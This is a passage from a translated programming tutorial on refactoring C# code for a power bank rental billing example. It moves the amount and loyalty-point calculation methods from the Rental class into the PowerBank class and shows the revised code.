A lot of people are using statistical hypothesis testing without knowing it. Everytime somebody does a A/B test, what they are doing is testing a hypothesis. There are many pits you can fall into when doing hypothesis testing, some of them obvious (do enough tests and you will find something!), some of them more subtle. One of the more subtle points is that you can not stop your experiment early. It is tempting to start collecting data and when you see the p-value drop to a low value declare: Hooray, this new button is working! People are signing up in record numbers! If you do this you are kidding yourself. This post will explain why this is the wrong thing to do. While it might be new and fashionable to use A/B testing, hypothesis testing itself has been around for a long time. It is used (and abused) in medical trials and High Energy Particle Physics all the time. This means most traps have been discovered before, there is no need for A/B testers to rediscover them. Just one recent example: Experiments at AirBnB by the mighty AirBnB. They like stopping their experiments early and provide a little glance at what methodology they use to do that. There is not enough information in the post to show that their method works, but let's assume it does. One thing not covered is what stopping early does to the power of your test. If you need a refresher on hypothesis testing, take a look at a previous post of mine: When to switch?. It also explains what the power of your test is. measure (how many observations there are). We use Student's t-test to calculate the p-value for each experiment.In this example we want to know if the changes to our website improved the conversion rate or not. The p-value is the probability of the mean in the second sample being bigger than the mean in the first sample due to nothing else but chance. In this case you can calculate the p-value by using Student's t-test. def two_samples(difference, N=6500, delta_variance=0.): As = np.random.normal(6., size=N) Bs = np.random.normal(6. + difference, scale=1+delta_variance, size=N) return As, Bs. return p Time to run an experiment. Let's assume that in total you collect 100 observations in each group. To see what happens with the p-value as we collect the data we will plot it after each a new observation has been collected in each group. # There is no difference between the two samples As, Bs = two_samples(0., N=100) p_vals = [] for n in xrange(len(As)-1): n += 2 p_vals.append(one_sided_ttest(As[:n], Bs[:n])) a = plt.axes() a.plot(np.arange(len(As)-1)+2, p_vals) a.set_ylabel("Observed p-value") a.set_xlabel("Number of observations") a.set_ylim([0., 1.]) a.hlines(0.05, 0, 100) <matplotlib.collections.LineCollection at 0x10ca20b10> As you can see it varies quite a bit over the course of the experiment. While in this particular case it never dipped below 0.05, you do not have to rerun that cell too often to find one where it does. If you were to do a large number of experiments where you show the same webpage to both groups and plot the p-value you see you would get the following: def repeat_experiment(repeats=10000, diff=0.): p_values = [] for i in xrange(repeats): A,B = two_samples(diff, N=100) p = one_sided_ttest(A,B) p_values.append(p) plt.hist(p_values, range=(0,1.), bins=20) plt.axvspan(0., 0.1, facecolor="red", alpha=0.5) plt.xlabel("Observed p-value") plt.ylabel("Count") repeat_experiment() As you can see 10% of your observed p-values fall into the red area. Similarly 5% of your experiments will give you a p-value of less than 0.05. All despite there being no difference! This brings us to what exactly the hypothesis testing procedure does for you. By choosing to declare victory when you observe a p-value below 0.05 you are saying: In the long run, over many repeats of this experiment there is only a 5% change of declaring victory when I should not. This is important. It does not tell you how likely it is that you have truely found something. It does not even tell you whether in this particular instance you are making the right choice. Only that in the long run, over many repeats of this experiment you will be wrong 5% of the time. So what does stopping early do to this? def repeat_early_stop_experiment(repeats=1000, diff=0.): p_values = [] for i in xrange(repeats): A,B = two_samples(diff, N=100) for n in xrange(len(A)-1): n += 2 p = one_sided_ttest(A[:n], B[:n]) if p < 0.05: break p_values.append(p) plt.hist(p_values, range=(0,1.), bins=20) plt.axvspan(0., 0.05, facecolor="red", alpha=0.5) plt.xlabel("Observed p-value") plt.ylabel("Count") repeat_early_stop_experiment() You see a small p-value, stop the experiment, declare victory and have a celebratory beer. Only to wake up with a massive hangover and a webpage which you think is better but actually is not. Even worse you have lost the only thing that the hypothesis testing procedure does for you. Namely, you see a p-value below 0.05 many more times than 5% of all experiments (1000 * 0.05 = 50). In the long run you will not be wrong only 5% of the time, but more often. So what about the power then? The power of a test is defined as the probability that you change your mind/website when you should do so. Phrased differently: if the alternative website is better, how likely are you to detect that? This depends on how big the difference between the two is and how many observations you make. The larger the improvements, the easier they are to detect. If B increases your conversion rate from 6 to 20%, you will spot that much easier than if it only changes it from 6 to 7%. Let's take a look what happens if you stop your experiments early. def keep_or_not(improvement, threshold=0.05, N=100, repeats=1000, early_stop=False): keep = 0 for i in xrange(repeats): A,B = two_samples(improvement, N=N) if early_stop: for n in xrange(len(A)-1): n += 2 p = one_sided_ttest(A[:n], B[:n]) if p < 0.05: break else: p = one_sided_ttest(A, B) if p <= threshold: keep += 1 return float(keep)/repeats def power_plot(improvements, normal_keeps, early_keeps): plt.plot(improvements, normal_keeps, "bo", label="normal") plt.plot(improvements, early_keeps, "r^", label="early") plt.legend(loc="best") plt.ylim((0, 100)) plt.xlim((0, improvements[-1]*1.1)) plt.grid() plt.xlabel("Size of the improvement") plt.ylabel("% decided to change") plt.axhline(5) improvements = np.linspace(1., 40, 9) keeps = [] early_keeps = [] for improvement in improvements: keeps.append(keep_or_not(improvement/100.)*100) early_keeps.append(keep_or_not(improvement/100., early_stop=True)*100) power_plot(improvements, keeps, early_keeps) This suggests that by stopping your experiment early you change your webpage to the alternative more often when there really is an effect! If the improvement is from 6% to 7% you are almost six times more likely to correctly change your mind. Surely this is a good thing. Not so fast! The reason it looks like stopping early boosts your chances of discovery is because we are not looking at the false positive rate. As we saw before, if you stop early you incorrectly change your website more often than 5% of the time. The power of a test also depends on how often you want to be wrong. If you have no problem being wrong all the time, then the best strategy is to always switch. You will correctly switch 100% of the time. What is the true false positive rate of the early stopping strategy? def false_positives(repeats=1000, early_stop=False, threshold=0.05): switches = 0 for i in xrange(repeats): A,B = two_samples(0., N=100) if early_stop: for n in xrange(len(A)-1): n += 2 p = one_sided_ttest(A[:n], B[:n]) if p < threshold: break else: p = one_sided_ttest(A, B) if p < threshold: switches += 1 return float(switches)/repeats print "Normal stopping strategy:", false_positives() print "Early stopping strategy:", false_positives(early_stop=True) Normal stopping strategy: 0.06 Early stopping strategy: 0.325 When making the decision after all observations have been collected the false positive rate is indeed close to 5%, as promised by the hypothesis testing procedure. For the early stopping method you end up with a false positive rate of something around 30%! How much lower do we have to make the p-value threshold with the early stopping strategy in order to have the same false positive rate of 5%? thresholds = (0.0025, 0.005, 0.01, 0.02, 0.03) fp_rates = [false_positives(threshold=p, early_stop=True) for p in thresholds] plt.plot(thresholds, fp_rates, "bo") plt.xlabel("p-value threshold") plt.ylabel("False positive rate") plt.grid() The threshold to use when stopping an experiment early has to be much, much lower than 0.05 to achieve the same actual false positive rate. Now we can re-run our comparison of the power of the two tests (normal and early stopping). Below we have the power of both tests for a false positive rate of 5%. improvements = np.linspace(1., 40, 9) keeps = [] early_keeps = [] for improvement in improvements: keeps.append(keep_or_not(improvement/100.)*100) early_keeps.append(keep_or_not(improvement/100., early_stop=True, threshold=0.005)*100) power_plot(improvements, keeps, early_keeps) Exactly that! You almost never decide to change to the new webpage. By stopping early and insisting on the same overall false positive rate you are making your test less powerful. The most common reason given for wanting to stop early is that you would not possibly want to miss out on an opportunity. By switching to the new design earlier, more customers will see it and as a result more of them will end up giving you their money. Turns out that by wanting to stop early you end up never switching your website, even if it is clearly better! The conclusion is that by trying to be smarter than generations of statisticians you are very likely to make things worse. You have to be very careful with what you are doing, to actually improve on the standard prescription of how to run an A/B test. Read some more about this and related problems on wikiepdia: Sequential analysis This post started life as a ipython notebook, download it or view it online.
http://betatim.github.io/posts/early-stopping/
CC-MAIN-2018-30
refinedweb
1,789
66.54
Hi, today I give a step by step guide to use mongoDB Atles with a python program. I decided to use the cloud version since it’s easy and as well as free. And most importantly I got ‘Unable to locate package mongodb-org/mongo’ error while trying to install on Kali 2020.1. If you still want to install mongodb on host please refer to this. Step 1: Create an Account of MongoDB Atlas Visit to create a free account. Step 2: Next Create a New Cluster You have to give the IP address that can access the cluster. It could be your device or can allow for anyone. - Find IP of your device: On browser visit - The IP for anyone to access : 0.0.0.0/0 (Have security issues) Next, give give the name and password for a DB user. These credentials later required to connect with the cluster from the python program. Step 3. Connect the DB Since I’m using the MongoDB within a Python program, I select as follows. “Connect Your Application” -> Choose “Python” driver and version (3.6 or later) used in the program Next, copy the generated String and replace the <password> with the given password when generating the DB user. Step 4. Generate a Database and a Collection Select ‘Collection’ –> It will prompt to create the database. Provide a name from Database and a Collection. –> Create Step 5: Update Python Program You should install the pymongo driver to use with the program. from pymongo import MongoClient client = MongoClient(<Past the generated String >)db = client.get_database('service')collection = db.get_collection('authdetails') Cheers !
https://techstarspace.engineer/2020/03/01/use-mongodb-cloud-with-python-on-kali-2020/
CC-MAIN-2020-34
refinedweb
270
64.81
Summary: Guest blogger, Trevor Sullivan, talks about using the CIM module second in a series of five posts by Trevor where he will talk specifically about using the CIM cmdlets. Yesterday’s post, What is CIM and Why Should I Use It in PowerShell?, provided a little bit of background on CIM and explained why you will want to use this exciting technology. Today’s post talks about the CIMCmdlets Windows PowerShell module. Here’s Trevor… Windows PowerShell 3.0, which was first included with Windows Server 2012 and Windows 8.0, introduced a new set of commands as part of a module called CIMCmdlets. The commands contained in the CIMCmdlets module offer several benefits over the legacy WMI cmdlets, including support for auto-completion and the use of the WS-Management remoting protocol. Auto-completion One of the more obvious usability enhancements in the CIMCmdlets module is the support for auto-completion of WMI namespace names and WMI class names. For example, if you were to use the Get-CimInstance cmdlet to retrieve instances of a WMI class, you can use tab-completion to fill in the values for the -Namespace and -ClassName parameters. If you attempt the same auto-completion operation by using the Get-WmiObject cmdlet, you will be sorely disappointed. The following image illustrates the way this has been incorporated into IntelliSense in the Windows PowerShell ISE. Windows Remote Management Under the hood, the CIMCmdlets module also offers something new that the WMI cmdlets cannot match. That capability is the use of the WS-Management remoting protocol (or WS-Man for short). WS-Management is implemented on the Windows platform through the Windows Remote Management (or WinRM) service. Every Microsoft Windows operating system since Windows 7 has this WinRM service built-in, and all you need to do is enable it. Besides being standards-based, WinRM offers the awesome benefit of predictable network traffic via a single, static port. When you make outbound connections to the WinRM service, you no longer have to worry about the dynamic port allocation issue that plagued DCOM/RPC. This simple fact will make dealing with security and network engineering personnel much easier, because they will not be required to open a large port range to accommodate DCOM/RPC. DCOM/RPC can be configured to use a static port since Windows NT 4.0 (for more information, see How to configure RPC dynamic port allocation to work with firewalls). But it’s not a standards-based remoting protocol, and trying to implement such customizations across your entire environment can be challenging, so it’s probably just easier to use WinRM these days. Limitations The CIMCmdlets PowerShell module has several limitations compared the WMI cmdlets. First of all, most of the CIMCmdlets do not have a -Credential parameter. The only way to specify alternate credentials is to manually build a new CIM session object, and pass that into the -CimSession parameter on the other cmdlets. Due to this missing parameter, you are required to write additional code to provide alternate credentials. If you would like to see a -Credential parameter added in a future version of Windows PowerShell, please vote on this bug in Microsoft Connect: DCR - CIMCmdlets need -Credential parameter. The next major limitation of the CIMCmdlets is the absence of a number of useful WMI system properties. When you use Get-WmiObject to retrieve a WMI class definition, or an instance of a class, there are several properties that are automatically added. The names of these system properties all start with two underscores (for example: __Derivation). Depending on your Windows PowerShell development goals, you may find this metadata to be useful. If you feel that this should be resolved in a future version of Windows PowerShell, please vote on this bug in Microsoft Connect: DCR - CIM cmdlets not returning WMI metadata. The last major shortcoming of the CIMCmdlets (that I am aware of) is the lack of WMI methods on .NET objects. When Get-WmiObject was the new kid on the block, static or instance-level WMI methods would be dynamically bound to the .NET object. In CIMCmdlets, the objects retrieved from WMI are not “live,” so you cannot call methods on the .NET object directly. Instead, you must retrieve the CIM instance, and then pass it into the Invoke-CimMethod cmdlet. Unfortunately, this lack of functionality goes against one of the original Windows PowerShell design goals of “discoverability” and being “self-describing.” That’s all for today! In tomorrow’s post, we will explore the commands in the CIMCmdlets module that you can use to retrieve and manipulate information. ~Trevor Thank you, Trevor. CIM Week will continue tomorrow when we will have another guest blog post from Trevor. all the great feedback, folks! @Osama: Thanks for the pointer, however I was already aware of the system properties for both CIM classes and CIM class instances. If you take a look at the Microsoft Connect feedback link, you’ll see that certain, important WMI system properties are missing. For example, people who are automating Microsoft System Center 2012 Configuration Manager, the lack of the __PATH property value is highly detrimental, as it does not allow them to deal with WMI classes & properties marked with the "Lazy" qualifier. For more information about Lazy properties in the System Center Configuration Manager WMI provider, check out this article: Thanks Trevor, great article! I’m looking forward to the whole series, I know understanding the how and why of the CIM cmdlets was a real pain in the neck for me. Nice! Great post. Love to see CimCmdlets picking up. BTW – You can get WMI system properties from CimInstance. Look into CimClass and CimSystemProperties – members properties. Not everything, but I guess most of the commonly used stuff is there (except path I think)
https://blogs.technet.microsoft.com/heyscriptingguy/2014/01/28/introduction-to-the-cimcmdlets-powershell-module/
CC-MAIN-2018-05
refinedweb
969
53.21
I have multiple CSV files which were generated from a keyword based SQL query. I now have to write a code which will read in a CSV file and take a keyword as input and display an output in terms of how many times the keyword appears in said file and where it appears. I have uploaded a sample file and below is the beginning of my code that I have so far. - Code: Select all import csv import collections mRNA = collections.Counter() with open('mrna.csv') as input_file: for row in csv.reader(input_file, delimiter=';'): mRNA[row[1]] = 1 print 'Number of times mRNA is Repeated: %s' % mRNA['mrna'] print mRNA.most_common()
http://python-forum.org/viewtopic.php?p=6284
CC-MAIN-2015-32
refinedweb
113
64.81
Returns the address of the software loopback interface structure. #include <sys/types.h> #include <sys/errno.h> struct ifnet *loifp () The loifp kernel service returns the address of the ifnet structure associated with the software loopback interface. The interface address can be used to examine the interface flags. This address can also be used to determine whether the looutput kernel service can be called to send a packet through the loopback interface. The loifp kernel service can be called from either the process or interrupt environment. The loifp service returns the address of the ifnet structure describing the software loopback interface. The loifp kernel service is part of Base Operating System (BOS) Runtime. The looutput kernel service. Network Kernel Services in AIX Kernel Extensions and Device Support Programming Concepts.
http://ps-2.kev009.com/tl/techlib/manuals/adoclib/libs/ktechrf1/loifp.htm
CC-MAIN-2022-40
refinedweb
129
50.33
[SOLVED] JSF returns blank/unparsed page with plain/raw XHTML/XML/EL source instead of rendered HTML output 2010-06-24 18:41:37 8 Comments I have some Facelets files like below. WebContent |-- index.xhtml |-- register.xhtml |-- templates | |--userForm.xhtml | `--banner.xhtml : Both pages are using templates from /templates directory. My /index.xhtml opens fine in browser. I get the generated HTML output. I have a link in /index.xhtml file to /register.xhtml file. However, my /register.xhtml is not getting parsed and returns as plain XHTML / raw XML instead of its generated HTML output. All EL expressions in form of #{...} are displayed as-is instead of that their results are being printed. When I rightclick page in browser and do View page source, then I still see the original XHTML source code instead of the generated HTML output. For example, the <h:body> did not become a <body>. It looks like that the template is not being executed. However, when I open the /register.xhtml like /faces/register.xhtml in browser's address bar, then it displays correctly. How is this caused and how can I solve it? Related Questions Sponsored Content 3 Answered Questions [SOLVED] Jsf pages to plain/text without header html - 2013-07-03 08:12:16 - noiseimpera - 2006 View - 0 Score - 3 Answer - Tags: java jsf servlets jsf-2 primefaces 2 Answered Questions [SOLVED] How do I use html5 with jsf 2 and facelets? 1 Answered Questions 1 Answered Questions [SOLVED] JSF page not rendering as HTML 1 Answered Questions [SOLVED] Component Tree not expanding when using ui:debug facelet tag 1 Answered Questions [SOLVED] <a href> link navigation doesn't detect templates in JSF 2.0 Facelets pages 2 Answered Questions [SOLVED] CommandLink navigation doesn't work in JSF - 2010-08-17 13:09:03 - Tim - 7899 View - 2 Score - 2 Answer - Tags: java jsf navigation jsf-2 faces-config @BalusC 2010-06-24 20:25:47 There are three main causes. FacesServletis not invoked. 1. Make sure that URL matches FacesServletmapping The URL of the link (the URL as you see in browser's address bar) has to match the <url-pattern>of the FacesServletas definied in web.xmlin order to get all the JSF works to run. The FacesServletis the one responsible for parsing the XHTML file, collecting submitted form values, performing conversion/validation, updating models, invoking actions and generating HTML output. If you don't invoke the FacesServletby URL, then all you would get (and see via rightclick, View Source in browser) is indeed the raw XHTML source code. If the <url-pattern>is for example *.jsf, then the link should point to /register.jsfand not /register.xhtml. If it's for example /faces/*, like you have, then the link should point to /faces/register.xhtmland not /register.xhtml. One way to avoid this confusion is to just change the <url-pattern>from /faces/*to *.xhtml. The below is thus the ideal mapping: If you can't change the <url-pattern>to *.xhtmlfor some reason, then you probably would also like to prevent endusers from directly accessing XHTML source code files by URL. In that case you can add a <security-constraint>on the <url-pattern>of *.xhtmlwith an empty <auth-constraint>in web.xmlwhich prevents that: JSF 2.3 which was introduced April 2017 has already solved all of above by automatically registering the FacesServleton an URL pattern of *.xhtmlduring webapp's startup. The alternative is thus to simply upgrade to latest available JSF version which should be JSF 2.3 or higher. But ideally you should still explicitly register the FacesServleton only one URL pattern of *.xhtmlbecause having multiple possible URLs for exactly the same resource like /register.xhtml, /register.jsf, /register.facesand /faces/register.xhtmlis bad for SEO. See also: 2. Make sure that XML namespaces match JSF version Since introduction of JSF 2.2, another probable cause is that XML namespaces don't match the JSF version. The xmlns.jcp.orglike below is new since JSF 2.2 and does not work in older JSF versions. The symptoms are almost the same as if the FacesServletis not invoked. If you can't upgrade to JSF 2.2 or higher, then you need to use the old java.sun.comXML namespaces instead: But ideally you should always use the latest version where available. See also: 3. Multiple JSF implementations have been loaded One more probable cause is that multiple JSF implementations have been loaded by your webapp, conflicting and corrupting each other. For example, when your webapp's runtime classpath is polluted with multiple different versioned JSF libraries, or in the specific Mojarra 2.x + Tomcat 8.x combination, when there's an unnecessary ConfigureListenerentry in webapp's web.xmlcausing it to be loaded twice. When using Maven, make absolutely sure that you declare the dependencies the right way and that you understand dependency scopes. Importantingly, do not bundle dependencies in webapp when those are already provided by the target server. See also: Make sure that you learn JSF the right way JSF has a very steep learning curve for those unfamiliar with basic HTTP, HTML and Servlets. There are a lot of low quality resources on the Internet. Please ignore code snippet scraping sites maintained by amateurs with primary focus on advertisement income instead of on teaching, such as roseindia, tutorialspoint, javabeat, etc. They are easily recognizable by disturbing advertising links/banners. Also please ignore resources dealing with jurassic JSF 1.x. They are easily recognizable by using JSP files instead of XHTML files. JSP as view technology was deprecated since JSF 2.0 at 2009 already. To get started the right way, start at our JSF wiki page and order an authoritative book. See also: @gekrish 2010-06-25 20:57:52 +1 for Security Constraint info. @BlueBird 2010-06-26 11:50:33 THanks BalusC. I will try this out and back to you. Keep in touch. @BlueBird 2010-06-26 19:17:17 Hi dear, Now I added my link using <h:link /> tag. The links work fine. Still I have one question. The link is automatically go into /faces/register.xhtml . Is there any way that I can hide the /faces/ directory and link should displayed /register.xhtml without the "faces" directory??? @BalusC 2010-06-26 19:19:36 Ah, you're using prefix mapping /faces/*, no you can't hide it. Use extension mapping like *.jsf, *.facesor even *.customextension. @BlueBird 2010-06-27 09:50:20 How to do that please? @BalusC 2010-06-27 21:17:25 Replace /faces/*by *.jsfas url-patternof FacesServlet. @UnknownJoe 2017-05-22 14:48:37 Just now had another option. p:remoteCommand had an update attribute with wrong id. Maybe, it will work out for somebody. @Kukeltje 2018-05-12 14:38:02 I'm 100% sure there is a related question of jsf tags not being rendered in 404 pages if not used correctly. Cannot seem to find it. Want to mark a question a duplicate of this 'lost' question @BalusC 2018-05-13 08:46:09 @Kukeltje: stackoverflow.com/q/2998576 or stackoverflow.com/q/25644513 maybe? @hagrawal 2018-05-18 18:45:08 Saved my day, sorry saved my night and that too Friday night, if we will ever met then I will buy you a beer, if you drink :)
https://tutel.me/c/programming/questions/3112946/jsf+returns+blankunparsed+page+with+plainraw+xhtmlxmlel+source+instead+of+rendered+html+output
CC-MAIN-2019-47
refinedweb
1,230
68.16
I have never used this device and plan to program it in C or C++. I’ll blog the learning experience here. If everything goes fine, there will be 3 deliverables: - Firmware for the micro:bit that listens to SCPI commands on its USB port, and acts upon those commands by displaying the / . - a LabVIEW driver library with easy to use init and control blocks. - a simple test setup with an automated LabVIEW flow that tests ‘something’. video: the device in action, controlled by a LabVIEW process First Firmware Program I'm using the Mbed web editor. I created an Mbed account, then added the BBC micro:bit as a board. After that, I imported the Hello, world! example. It compiled without any difficulties and worked straight away when I loaded the firmware to the board. But to be sure that I can use it as a LabVIEW programmable device, I had to try if the SCPI parser library that I use in most of my project works on the micro:bit. I cloned the Hello, world! project, added the sources of the SCPI lib and did a test compile. I had one unexpected error. The compiler did not appreciate this (re)definition of bool in the lib's types.h file. #if !HAVE_STDBOOL typedef unsigned char bool; #endif The fix was to comment them out and replace by: #include <stdbool.h> Another option is to define the HAVE_STDBOOL symbol. I also had a few expected errors because the SCPI lib does not define all functions. You need to provide a few yourself. Once I did that - I simply copied the lib's parser testcase, it contains a definition for all necessary functions - all compiled well. And it works. I attached a console to the USB port (speed: 115200) and could see the test result stream. In the image above, you see MICRO_BIT and PASS_FAIL in the output. Those are the values I programmed for the manufacturer and device name (the SCPI attributes for the *IDN? command). That's it for the first program. My second project will try to read from the USB port. Figure: display and IO behaviour for all 3 states. Second Firmware Version: SCPI Commands, USB and Display The next version of the program has improved a few things. The micro:bit is now listening for commands in sleep mode. Only when a character appears, it'll wake up and send that character to the SCPI parser. #include "MicroBitSerial.h" // ... MicroBitSerial serial(USBTX, USBRX); // ... while(1) { // the device goes into low power when no characters arrive character = serial.read(SYNC_SLEEP); SCPI_Input(&scpi_context, (const char *) (&character), 1); } The SCPI output function is also using the serial class: size_t SCPI_Write(scpi_t * context, const char * data, size_t len) { (void) context; return serial.send((uint8_t *)data, len); } To display the success and fail status, I've created two bitmaps. A plus and a cross drawing. I first tried to write these with the micro:bit built-in font, but did not like how the X is displayed. MicroBitImage imgPass("0, 0, 255, 0, 0\n0, 0, 255, 0, 0\n255, 255, 255, 255, 255\n0, 0, 255, 0, 0\n0, 0, 255, 0, 0\n"); // plus MicroBitImage imgFail("255, 0, 0, 0, 255\n0, 255, 0, 255, 0\n0, 0, 255, 0, 0\n0, 255, 0, 255, 0\n255, 0, 0, 0, 255\n"); // X To control the device, I've written a single SCPI command that can set the state. Here is the syntax [:INDicator:]STAte PASs [:INDicator:]STAte FAIl [:INDicator:]STAte CLEar E.g.: you can send the STA PAS command to display the cross image. The three possible states are defined as SCPI enumerators: enum scpi_state_t { SCPI_STATE_PASS, SCPI_STATE_FAIL, SCPI_STATE_CLEAR }; const scpi_choice_def_t scpi_state_def[] = { {/* name */ "PASs", /* type */ SCPI_STATE_PASS }, {/* name */ "FAIl", /* type */ SCPI_STATE_FAIL }, {/* name */ "CLEar", /* type */ SCPI_STATE_CLEAR }, SCPI_CHOICE_LIST_END, }; The SCPI command handler acts based on the requested state: static scpi_result_t setState(scpi_t * context) { int32_t param1; scpi_bool_t result; scpi_result_t retval; result = SCPI_ParamChoice( context, scpi_state_def, ¶m1, TRUE ); if ( false == result ) { return SCPI_RES_ERR; } else { switch (param1) { case SCPI_STATE_PASS: uBit.display.clear(); uBit.display.print(imgPass); retval = SCPI_RES_OK; break; case SCPI_STATE_FAIL: uBit.display.clear(); uBit.display.print(imgFail); retval = SCPI_RES_OK; break; case SCPI_STATE_CLEAR: uBit.display.clear(); retval = SCPI_RES_OK; break; default: SCPI_ErrorPush(context, SCPI_ERROR_ILLEGAL_PARAMETER_VALUE); retval = SCPI_RES_ERR; } } return retval; } That handler is registered into the SCPI lib as follows: {.pattern = "[:INDicator]:STAte", .callback = setState,}, video: initial test of the SCPI commands and the LED matrix That's all that's needed to make this work. In the next version I'll add the GPIO functionality to pull a pin high at Pass or Fail. Third and Final Firmware Version: Add GPIO The final firmware version adds two output pins. Pin 0 on the micro:bit sets high on success. Pin 1 on failure status. This requires little changes. In the main() function we set both pins to 0, just after initialising the board. // Initialise the micro:bit runtime. uBit.init(); uBit.io.P0.setDigitalValue(0); uBit.io.P1.setDigitalValue(0); Then, in the SCPI handler, based on the state, the appropriate pin is set: case SCPI_STATE_PASS: uBit.io.P1.setDigitalValue(0); uBit.io.P0.setDigitalValue(1); // ... break; case SCPI_STATE_FAIL: uBit.io.P0.setDigitalValue(0); uBit.io.P1.setDigitalValue(1); // ... break; case SCPI_STATE_CLEAR: uBit.io.P0.setDigitalValue(0); uBit.io.P1.setDigitalValue(0); // ... break; The Mbed project is attached to this blog post. LabVIEW Driver The driver library contains the necessary blocks to control the micro:bit and an example process. This is also attached at the end of this blog post. State Control block: Initialize block: Reset block: Default Setup block: Close block: LabVIEW Example Process I've used the simplest process that shows the micro:bit Pass / Fail device functions. image: demo process runs through the three statuses of the micro:bit pass / fail device Because it uses the driver's functional blocks, all is fairly easy. It connects to the micro:bit over USB. Then it steps through PAS, FAIL and CLEAR status until you press the stop button. At the end the connection is closed and resources freed. When you execute this flow, you can see the micro:bit LED matrix represent the statuses. You can also measure the signals on pin 0 and 1 during the execution. Before executing the process, select the COM port that's assigned to the micro:bit. If you've installed the Mbed USB serial driver (Windows only, neccessary for Windows versions < 10), set the "Uses Mbed USB driver True. Else set this witch off. You can see if the USB driver is the MBed one by opening the device manager, open the Ports node and check if the micro:bit entry says mbed serial. If yes, you use the driver and youhave to flip the switch. image: take care to select the COM port and USB driver of your micro:bit before starting. In a real world process, the device is intended to be part of an automated test jig. The state would be set based upon a successful or failed test. The fail pin can be used to sound a horn or to drive a gizmo that kicks the device under test into a repair bin. Source Code for micro:bit and LabView The LabVIEW driver is attached as a ZIP archive below. The source code can be imported and built by following these steps: In Mbed, click import. Then click on the link to import from URL: Enter Select these options: After Import, you can select the project and press compile. If all works OK, Mbed creates a hex file and places it in your Download folder. If you drop that file on your micro:bit, it should be programmed as a Pass / Fail device. You can test this by connecting to its COM port with PuTTY, 115200. type STA PAS then enter (you don't see what you type) It should show a + on the led matrix. This is a WIP type of blog that will get updated each time I make progress finished blog. This Project14 theme runs until November 14. That’s the time I’ll give myself to complete this. - LabVIEW.zip 90.2 KB
https://www.element14.com/community/community/project14/test-instrumentation/blog/2018/10/30/microbit-as-pass-fail-indicator-in-an-automated-test-setup
CC-MAIN-2019-39
refinedweb
1,365
64.41
Continuing my series on data import into PostgreSQL database, this covers a quick way of getting MySQL data into Postgres. MySQL to Postgres with Python Of course, one doesn’t need to rely on GUI tools for ETL jobs. Here’s a short Python script that can be used to extract data from the MySQL Sakila demo schema. This assumes you have the MySQL Connector for Python installed within your Anaconda install on Windows. Similar steps are available for Linux systems. conda install -c anaconda mysql-connector-python=2.0.4 As well, you’ll need the Postgres driver for Python, named psycopg2. This probably was included with Anaconda, but if not then try: pip install psycopg2 Finally, we’ll be using the petl and sqlalchemy libraries for ETL in Python. pip install petl sqlalchemy Now we’re all set. We’ll extract records from the MySQL sakila.staff table and store them into the ‘employee’ table in Postgres. First let’s open up some database conections. import sys import petl import mysql.connector import psycopg2 import sqlalchemy my_eng = sqlalchemy.create_engine('mysql+mysqlconnector://sakila:sakila@localhost/sakila') my_cnx = my_eng.connect() pg_eng = sqlalchemy.create_engine('postgresql+psycopg2://postgres:postgres@localhost/hr') pg_cnx = pg_eng.connect() Then we’ll read the staff records into a table object. We could also perform transforms and other cleanups here if needed. my_staff = petl.fromdb(my_cnx, 'SELECT staff_id, first_name, last_name, email FROM staff') Next we’ll create a target table in Postgres and write out the staff records. pg_eng.execute("DROP TABLE IF EXISTS employee") pg_eng.execute( """CREATE TABLE employee ( staff_id INT PRIMARY KEY, first_name VARCHAR(45), last_name VARCHAR(45), email VARCHAR(50) ) """) try: petl.todb(my_staff, pg_cnx, 'employee') except sqlalchemy.exc.DataError as err: print("Unexpected error: {0}".format(err)) raise pg_cnx.close() my_cnx.close() I did try the automatic table creation feature of sqlalchemy, but found it was creating columns too small to hold the records. I also messed around with sqlalchemy’s MetaData object, but was not overly impressed. As such, the CREATE TABLE above provides more explicit control over the target table schema. So, with just a few lines of code, one can easily setup an ETL process for moving data between MySQL and Postgres databases using Python’s petl library. More in this series… - Oracle into PostgreSQL with Talend - SQL Server into PostgreSQL with SquirrelSQL - Excel into PostgreSQL with RapidMiner - Data Virtualization with PostgreSQL
https://guydavis.github.io/2016/06/21/mysql_to_postgres/
CC-MAIN-2019-09
refinedweb
401
51.14
eight. restructure5: continue to move the corresponding method(Move Method) Pass“Code refactoring and unit testing — refactoring of “extraction method” (3)”To“Code refactoring and unit testing — refactoring the statement () method again with “replacing temporary variables with queries” (7)”After several refactorings of these articles, we observe and analyze the code of the charging item of the power bank again. We find that the code in the getamount() and getfrequentrenterpoints() methods of the rental class has a great dependence on the powerbank class. Because these two methods only use the rentedtime attribute in the rental class, and use the attribute or field in powerbank many times. Through the above analysis, we think it is more reasonable to move the code in these two methods to the powerbank class. Next, we continue to refactor these two methods — moving this part of the code into the powerbank class. 1. This time is the same as before“Code refactoring and unit testing — moving methods to appropriate [dependent] classes (6)”The mobile methods in this article are different. This time, the declarations of these two methods should be kept in the rental. Create a new method with the same method name in the powerbank class. After moving the contents of the method to powerbank, call the methods in the powerbank class in the rental. The following is the content of our powerbank class after this refactoring. The red code is the code we moved over, while the italic code is the parameter that needs to be passed in from the outside. The specific codes are as follows: using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace LeasePowerBank { /// ///Charging treasure /// public class PowerBank { //Type of passenger flow in the section public static int LowTraffic = 0;// Low traffic section public static int MiddleTraffic = 1;// Medium traffic section public static int HighTraffic = 2; // High traffic section public int PriceCode; // Price code public string Title;// Name of power bank public PowerBank(string title,int priceCode) { PriceCode = priceCode; Title = title; } /// ///Calculate the points according to the consumption amount and the location of the power bank /// ///Lease time /// public int GetFrequentRenterPoints(int RentedTime) { int frequentRenterPoints = 0; decimal amount = GetAmount(RentedTime); //Calculate integral if (this.PriceCode == HighTraffic && RentedTime > 4) { frequentRenterPoints += (int)Math.Ceiling(amount * 1.5M); } else frequentRenterPoints += (int)Math.Ceiling(amount); return frequentRenterPoints; } /// ///Calculate the total amount according to the order of power bank /// ///Lease time /// public decimal GetAmount(int RentedTime) { decimal amount = 0M; switch (this.PriceCode) { case 0: amount = RentedTime; if (RentedTime > 12) { amount = 12; } break; case 1: amount = RentedTime * 3; if (RentedTime > 24) { amount = 24; } break; case 2: amount = RentedTime * 5; if (RentedTime > 50) { amount = 50; } break; default: break; } return amount; } } } 2. After moving the corresponding method code into powerbank class, we need to call it in rental. When calling the corresponding method, you can pass in the corresponding parameters. As shown in the following figure, the code in the figure is the code of the rental class after this reconstruction, and the code in the red box is the call to the newly added method in powerbank. The code is as follows: using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace LeasePowerBank { /// ///Leasing /// public class Rental 